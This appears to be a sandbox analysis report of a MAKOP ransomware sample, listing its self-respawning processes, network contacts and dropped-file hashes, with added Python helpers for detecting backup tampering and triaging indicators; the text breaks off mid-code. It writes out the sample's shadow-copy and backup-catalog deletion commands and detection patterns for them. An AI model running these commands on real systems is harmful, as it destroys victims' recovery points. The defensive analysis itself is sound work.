"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
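
The three system commands in the tree above (vssadmin delete shadows /all /quiet, wbadmin delete catalog -quiet, wmic shadowcopy delete) are the recovery-inhibition step that the "Uses Volume Shadow Copy service COM API" signature and the ransomware tag summarise, and the long run of MAKOP_27_10_2020_115KB.exe launches with the single argument n2812 is the sample re-executing itself as worker processes; 2812 is also the PID in the memory-dump names under Files, so the argument is read here as the parent's PID (an inference from the report, not something it states). The helper below is an added example, not part of the report or of any sandbox product: it flags backup-tampering command lines and counts identical-image respawns grouped by that argument. The process rows are a constructed subset of the Processes list, and the last two patterns (vssadmin resize shadowstorage, bcdedit recovery settings) go beyond this page to cover common variants of the same technique.

```python
"""Triage helpers for a flattened (image, command line) process list.
Added example; not part of the sandbox report."""
import re
from collections import Counter

# Command lines that destroy or disable local recovery points.  The first three
# are the ones this report shows; the last two are common variants of the same
# technique added for coverage (not on this page).
BACKUP_TAMPER_PATTERNS = {
    "vssadmin_delete_shadows": re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I),
    "wbadmin_delete_catalog": re.compile(r"\bwbadmin(?:\.exe)?\s+delete\s+catalog\b", re.I),
    "wmic_shadowcopy_delete": re.compile(r"\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b", re.I),
    "vssadmin_resize_shadowstorage": re.compile(r"\bvssadmin(?:\.exe)?\s+resize\s+shadowstorage\b", re.I),
    "bcdedit_recovery_off": re.compile(
        r"\bbcdedit(?:\.exe)?\b.*\b(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.I),
}

# Worker respawn: the command line is just the image path plus one argument "n<pid>".
WORKER_ARG = re.compile(r'^"?(?P<image>[^"]+\.exe)"?\s+n(?P<pid>\d+)\s*$', re.I)

# Constructed subset of the Processes list above (the report shows far more
# worker launches than the three repeated here).
MAKOP = r"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"
SAMPLE_ROWS = [
    (MAKOP, f'"{MAKOP}"'),
    (MAKOP, f'"{MAKOP}" n2812'),
    (MAKOP, f'"{MAKOP}" n2812'),
    (MAKOP, f'"{MAKOP}" n2812'),
    (r"C:\Windows\system32\cmd.exe", r'"C:\Windows\system32\cmd.exe"'),
    (r"C:\Windows\system32\vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    (r"C:\Windows\system32\wbadmin.exe", "wbadmin delete catalog -quiet"),
    (r"C:\Windows\System32\vdsldr.exe", r"C:\Windows\System32\vdsldr.exe -Embedding"),
    (r"C:\Windows\System32\Wbem\WMIC.exe", "wmic shadowcopy delete"),
]


def classify_backup_tampering(cmdline: str):
    """Names of the tampering patterns that match cmdline; empty list when clean."""
    return [name for name, rx in BACKUP_TAMPER_PATTERNS.items() if rx.search(cmdline)]


def summarize(rows):
    """rows: iterable of (image, command line).
    Returns the tampering hits and, per pid argument, how many times the same
    image respawned itself as a worker."""
    tampering = []
    workers = Counter()
    for image, cmdline in rows:
        hits = classify_backup_tampering(cmdline)
        if hits:
            tampering.append((image, cmdline, hits))
        m = WORKER_ARG.match(cmdline)
        # Only count it as a worker when the relaunched image is the parent's own.
        if m and m.group("image").lower() == image.lower():
            workers[m.group("pid")] += 1
    return {"tampering": tampering, "workers": dict(workers)}


if __name__ == "__main__":
    for image, cmdline, hits in summarize(SAMPLE_ROWS)["tampering"]:
        print(f"{image}: {cmdline}  <- {', '.join(hits)}")
    print("worker respawns by parent pid:", summarize(SAMPLE_ROWS)["workers"])
```

Feed it (image, command line) pairs from a real process-creation log (Sysmon event 1 or Windows event 4688); the tampering matches stand on their own as high-confidence alerts, while the respawn count is a supporting signal whose shape depends on the family.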

Network

Country Destination Domain Proto
US 8.8.8.8:53 iplogger.org udp
US 172.67.132.113:443 iplogger.org tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 2.18.190.81:80 apps.identrust.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
GB 95.100.245.168:80 x2.c.lencr.org tcp
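
Only one of the three hostnames is attributable to the sample. iplogger.org is a public IP-logging and link-tracking service, and 172.67.132.113 sits in Cloudflare's 172.64.0.0/13 range, so the hostname rather than the address is the indicator to pivot on. apps.identrust.com and x2.c.lencr.org are IdenTrust and Let's Encrypt (lencr.org) distribution endpoints that Windows CryptoAPI contacts over plain HTTP while building the certificate chain for the TLS session; the CryptnetUrlCache\MetaData entry under Files is the cache of that fetch, and these two hosts should not be turned into IOCs. The snippet below is an added example, not part of the report: it pairs each DNS lookup with the connection it led to and applies that labelling. The rows are copied from the table above; the CA suffix list is an assumption of this example and should be extended for the CAs seen in your own environment.

```python
"""Pair DNS lookups with the connections they led to and separate CA
infrastructure from candidate indicators.  Added example; not part of the report."""
from collections import defaultdict

# Rows copied from the Network table: (country, destination, domain, proto)
NETWORK_ROWS = [
    ("US", "8.8.8.8:53", "iplogger.org", "udp"),
    ("US", "172.67.132.113:443", "iplogger.org", "tcp"),
    ("US", "8.8.8.8:53", "apps.identrust.com", "udp"),
    ("GB", "2.18.190.81:80", "apps.identrust.com", "tcp"),
    ("US", "8.8.8.8:53", "x2.c.lencr.org", "udp"),
    ("GB", "95.100.245.168:80", "x2.c.lencr.org", "tcp"),
]

# Hosts that Windows CryptoAPI contacts on its own to fetch issuer certificates
# and revocation data while validating a TLS chain.  Assumption of this example:
# extend for the CAs your environment actually talks to.
CA_INFRA_SUFFIXES = ("lencr.org", "identrust.com")


def is_ca_infrastructure(domain: str) -> bool:
    d = domain.lower()
    return any(d == s or d.endswith("." + s) for s in CA_INFRA_SUFFIXES)


def triage(rows):
    """Group rows by domain: which resolver answered, what was connected to, and a verdict."""
    by_domain = defaultdict(lambda: {"resolvers": set(), "connections": [], "verdict": ""})
    for country, dest, domain, proto in rows:
        host, port = dest.rsplit(":", 1)
        entry = by_domain[domain]
        if proto == "udp" and port == "53":
            entry["resolvers"].add(host)          # the lookup, not the endpoint
        else:
            entry["connections"].append((host, int(port), proto, country))
    for domain, entry in by_domain.items():
        if is_ca_infrastructure(domain):
            entry["verdict"] = "chain-building side effect"
        elif any(port == 443 for _, port, _, _ in entry["connections"]):
            entry["verdict"] = "candidate IOC (TLS)"
        else:
            entry["verdict"] = "candidate IOC"
    return dict(by_domain)


def candidate_iocs(rows):
    """Domains left after the CA-infrastructure noise is removed."""
    return sorted(d for d, e in triage(rows).items() if e["verdict"].startswith("candidate IOC"))


if __name__ == "__main__":
    for domain, entry in triage(NETWORK_ROWS).items():
        print(f"{domain:22s} {entry['verdict']:28s} {entry['connections']}")
```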

Files

\Users\Admin\AppData\Local\Temp\nso8B5F.tmp\System.dll

MD5 fccff8cb7a1067e23fd2e2b63971a8e1
SHA1 30e2a9e137c1223a78a0f7b0bf96a1c361976d91
SHA256 6fcea34c8666b06368379c6c402b5321202c11b00889401c743fb96c516c679e
SHA512 f4335e84e6f8d70e462a22f1c93d2998673a7616c868177cac3e8784a3be1d7d0bb96f2583fa0ed82f4f2b6b8f5d9b33521c279a42e055d80a94b4f3f1791e0c

memory/2812-7-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2812-10-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2812-9-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2812-16-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2812-26-0x0000000000400000-0x000000000041F000-memory.dmp

C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\readme-warning.txt

MD5 d171c561e20fc9714f85da3c4331d0b6
SHA1 8f7e6cd4bda627a0a3d1a0e687c8b998db3b9438
SHA256 3c829147b1f82f255e4032d2a22d5b83932bc7f74f3540137146530be0353aac
SHA512 b52823ac0dba9dec6a243d1a3d68718c2a825dae4d6f4f312e92d87ecb87dbb066f259b317628fa588ad1abc4a59e095e5e302e53294bd8b34d414fadc8420c2

C:\Users\Admin\AppData\Roaming\779389082

MD5 40b7f298d30296864906d4e175ff9f43
SHA1 349b60915d0ce78aacc57231ae1e0df151e20087
SHA256 2448a49c12e2c959a2f88d179c346a4d753725578a4755c8f8f487b1048fdcd4
SHA512 ed4c76fa8e4e0eb527f34ea6a25094ee8bdc343be1c0806bcb8baff3cd77e6944cee50125090a7fd8869951b53ced7dce4a48a197859a1e4616c7495390b36e7

memory/2812-2181-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2524-6141-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2524-6796-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2524-6795-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Roaming\779389082

MD5 ba41580a52e592f902ce53d5bf4eaddc
SHA1 463acff5a71dd7c580b7ae52091dc5ec3075fb0a
SHA256 50577e8ae3331aa6d25cfb4a270291ee3503d88febca708d9de04b796ee694df
SHA512 4697440accd08c20b9807471d6443f827f001ef4bbb733f2323d29cb4613bfc944f0798d5b3a2502931826898a3ff0255f0e62118445118e296bdb2e92b77086

C:\Users\Admin\AppData\Local\Temp\Cab8317.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar83F4.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2b90448ce29f4e674788aeb7ad767303
SHA1 9b8f30a99850feb5d15a34adf623460628cc8468
SHA256 38ac14ad85a09c9f1390823699b30156c4f3b5220566afd2ba971270cb2d5c3d
SHA512 0187c6d45549d7cda4b76634a3e49bb1093d52aa6db97ad57c69049de908927f2af6afbc7dd492dd4f8f85a20dce62b4c90ce06ed342e1ebdba62155cfe76945

memory/2812-18827-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1260-18905-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1260-18907-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1260-18906-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Roaming\779389082

MD5 df63728d68a4ac8b176671b22e5b3b76
SHA1 839728f505861e48749e9ee81210cca4125d3537
SHA256 bd1aa34af510bdbe455df7e883e3ab3d2a220a703fffe872e13d2167519f311e
SHA512 6e6878f30d7dfa2aae6eb6a874852df9c440c9a3257d4dba97176706c4b68cfceec1dc3eabf8d02329b2fbca7a4f7995ebd944f1926e19b689bf5d3ff850fb50

C:\Users\Admin\AppData\Roaming\779389082

MD5 8e7e18c8210e7d646ba907dc2cfa4a6b
SHA1 4255763de5f28bf6fd0d8fedecdcfd2404640c2d
SHA256 8ffe6a6cebda792b30d97a1a63c83022eb68e40cbe707e6d17dd02dce7af63a1
SHA512 a8f977c603ea40b17afbad99f734e3bf3a0b51d0c2e4680508d3b23c555794c8b7031a4c8df39b65ba9f29ee84f154c37475b0b30bc70bc897871d15043ec996

\??\PIPE\wkssvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\779389082

MD5 4a3b09bfb912f280a4aa4b8dc4b58862
SHA1 bd37c1b38e009f035e16ca6f4c73d730508f8e5e
SHA256 f640cf30c960268b2b2e27ee202a5d7474b5da127b3c9374724166858c24a8a7
SHA512 76ad7cf9f6f14d7d51e22b231e60fd6f42f3683ec921d19ff886e8e54ba7518ebdc88942b0d546200983949c56d8dc9067833f84803737e66d56891a4e2efeb2

C:\Users\Admin\AppData\Roaming\779389082

MD5 9b0399133aed66f49a14ff6a227f88d4
SHA1 ab030c6437390e573b9dc2e7a60a8db193264422
SHA256 8dae63d671d34974468b6d9f39b75ad69fc20fb513606f93f82ddcd4b61a3f3c
SHA512 176f1d0358fe911bb1a23e33e66cd5021453a91f5a33b399930c2338ba46e3719326aefbdaab4ba198408c6a4aa889d4b6809d115b37309fc4271b922666a546

C:\Users\Admin\AppData\Roaming\779389082

MD5 c5da74a39363bc6170af60df8b32c49f
SHA1 2c129125a373564ce77d4ac4475c8a887566ae8c
SHA256 544e5401fc63101ff7383fb4b696ab1d5b4a55071c7ea463237633c574621384
SHA512 76e26c133adc776df9063c0c852fd3b57d98aa97f764dff880440594ba1d32318e3ebe3989b927eb78b0564674d86f313836ae1e47c459a9a881d26789760bb7

C:\Users\Admin\AppData\Roaming\779389082

MD5 fe292e7917d830e18d27a3998fca1ec3
SHA1 bac8235e38cb0568b13f26d945bee18257b38a46
SHA256 62cd2f8be0163a0cf04bfd27b24b23149574d8c1226389dfa1bff638f8394651
SHA512 148e60e57982d79695fe3cb8361a3580e321b8872bd2f232262a0aa46aa28d1bf51be3cf32bcc5c80a2093b6f2a7cf68f80e5705b46bb2eb71d0212844e2d82b

C:\Users\Admin\AppData\Roaming\779389082

MD5 0f33a9748ef0bb30d30b783bdc83a99c
SHA1 1a7fbc4b6e0cde24f7ee58eb45627c1641c989fa
SHA256 aa93019b5bcc01adf7726d6f15aee83ea62cbc14f327e59f02a9a2342eb58e30
SHA512 0f17a23dbf1251ec90291d54e4c8bacbd231c4809368fa0aa7d733c523174de43ad319eb098a7120ae9b60400894cf83b7eecb401744c36ec0e1fd5e4d6f2ca1

C:\Users\Admin\AppData\Roaming\779389082

MD5 a524ebe0dfab9ea297286050d66ba1ed
SHA1 665c7d801635dd431f3d97f08baf14b9daf8a6e1
SHA256 4a095728d509404987228dc20d6e23db732f4a0ec6c66b0cf89699926b5ed3f6
SHA512 a924e8ba45d96c7193c9a61b2f1753bbaa48beeeb1a9058974534bb1fb58aa213841c6c729b414016d0c00fa7b1eca08da862a9fd045e3e5455aba826ba5c1c4

C:\Users\Admin\AppData\Roaming\779389082

MD5 2d17f934f25fa2afe05b03468cb39468
SHA1 7e1de8cb0b326438aa7a7e3dc2168579615dcd8d
SHA256 1c07aeddbabbf1775679040612da2e23ece91fc59f04b54bbf8a3c13c4baf8b3
SHA512 b79fc2195d752e62b1afd6bbccf745facd9f47442a7a843d55892189770914fc201fc75ed12c36cb2e53323396543ac68a405a0bdac973c21b5cee3a8d956bca

C:\Users\Admin\AppData\Roaming\779389082

MD5 32e8ec4346f13ce0568de7bf7fefb6fe
SHA1 ad04279bd0147432c997ebe0d52fd80d662b2f8d
SHA256 cf0ab6f8beb2f23ee9b75633ed2faaf82f14fa3ed797d8407a6a841b6e94d227
SHA512 2abbe29c8f7342779da0ada5ce245a76e6c2f3b601615407e8924f847327063b09455233727562bb4367500b73ebe22ff0a2ff3257dd23f07f38b20ad2242199

C:\Users\Admin\AppData\Roaming\779389082

MD5 79ecf11a4c0e2c95c2cb132dd124da9d
SHA1 2d36fc5b1a614127b5699e257c9df7ebc9fd7f0a
SHA256 8cffbaceb7c043551fef7b20ab7d5ce465c00e656980fc8bff19e1bc7f03b235
SHA512 92bef0f9e1c521e05b37187c47f69a8fd9ea842c2c964613be798e528fc70eae15e18fcb5489176529c6ab546715a55b47f08dbeb141d998c8a8f993fee36c62
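
Three things in the Files list above deserve a caveat before any of it becomes an indicator. The System.dll under an ns<hex>.tmp directory is the layout NSIS installers use for their System plug-in, so that hash is likely shared with many benign NSIS-built packages and should be checked against a known-good corpus first. The \??\PIPE\wkssvc entry carries the MD5, SHA-1 and SHA-256 of zero-length input, meaning the sandbox recorded a handle to the Workstation service named pipe with no content, not a file. And C:\Users\Admin\AppData\Roaming\779389082 appears many times with a different digest each time: one path rewritten repeatedly during the run, not a dozen distinct files. The snippet below is an added example, not part of the report: it computes the empty-input digests rather than hard-coding them, drops memory-dump entries, and groups rewritten paths. The entries are a constructed subset of the list above with SHA-512 omitted.

```python
"""Reduce a sandbox Files list to pivotable artefacts.
Added example; not part of the report."""
import hashlib
from collections import defaultdict

# Digests of zero-length input.  An entry carrying these was captured with no
# content (here the \??\PIPE\wkssvc named pipe) and is not a usable IOC.
EMPTY_DIGESTS = {
    "md5": hashlib.md5(b"").hexdigest(),
    "sha1": hashlib.sha1(b"").hexdigest(),
    "sha256": hashlib.sha256(b"").hexdigest(),
}

# Constructed subset of the Files entries above (SHA-512 omitted).
FILE_ENTRIES = [
    {"path": r"\Users\Admin\AppData\Local\Temp\nso8B5F.tmp\System.dll",
     "md5": "fccff8cb7a1067e23fd2e2b63971a8e1",
     "sha256": "6fcea34c8666b06368379c6c402b5321202c11b00889401c743fb96c516c679e"},
    {"path": "memory/2812-7-0x0000000000400000-0x000000000041F000-memory.dmp"},
    {"path": r"C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\readme-warning.txt",
     "md5": "d171c561e20fc9714f85da3c4331d0b6",
     "sha256": "3c829147b1f82f255e4032d2a22d5b83932bc7f74f3540137146530be0353aac"},
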